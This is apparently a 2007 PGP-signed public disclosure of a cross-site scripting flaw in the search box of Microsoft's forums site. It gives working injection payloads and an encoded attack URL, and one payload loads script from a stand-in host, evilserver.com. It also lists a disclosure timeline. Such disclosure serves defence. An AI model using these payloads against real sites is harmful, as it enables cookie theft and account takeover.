-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

XSS in http://forums.microsoft.com/ - could lead to cookie/account
stealing, information disclosure and more...

Start e.g. here:
http://forums.microsoft.com/Genuine/default.aspx?SiteID=25

Enter one of the following examples in searchbox of forum, the
second searchbox on page (not "Search Microsoft.com for"):

Example 1
"><script>alert("xss")</script><x x="

Example 2
"><br><iframe width=700 height=400 src=http://google.com/><x x="

Example 2 as full URL:

All in one line:

http://forums.microsoft.com/Genuine/Search/Search.aspx?words=%22%3e%
3cbr%3e%3ciframe+width%3d700+height%3d400+src%3dhttp%3a%2f%2fgoogle.
com%2f%3e%3cx+x%3d%22&localechoice=9&SiteID=25&searchscope=allforums

Remove linebreaks:

http://forums.microsoft.com/Genuine/Search/Search.aspx?words=%22
%3e%3cbr%3e%3ciframe+width%3d700+height%3d400+src%3dhttp%3a%2f%2
fgoogle.com%2f%3e%3cx+x%3d%22&localechoice=9&SiteID=25&searchsco
pe=allforums

Example 3
"><script src=http://evilserver.com/evil.js></script><x x="

The length of searchstring is limited, but we can include scripts
from evilserver.com, so that doesn't matter at all. Example 3 has
been added after disclosure to MS.

Disclosure timeline:
04-Sep-2007: secure-at-microsoft.com (no response at all)
06-Sep-2007: public disclosure

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.5

wpwEAQECAAYFAkbf9uwACgkQFHZ6LRIhCQUcDAP/YuFdpIRkC3QgEFzjoM59rgW8CZD1
YsDbO2bWeKUzEFAoRqRzhvNhMax3/QEFi3Z61DoRANbvrYumkPZ7cbexgbDzyfqEegVj
bjU/1QITCJMYb7utgg1w3wX5WTXKa6mr19bhVou/gHKmYs+ddPL+aIR1Dji32M881euk
hUMhBGY=
=R376
-----END PGP SIGNATURE-----

--
Tired of renting? Click here to buy a home without breaking the bank.  Get an interest only loan.
http://tagline.hushmail.com/fc/Ioyw6h4dQLQgODJBWkHuQkD2UTaSLwrDsAymv6lIlffqOET7ql7qHG/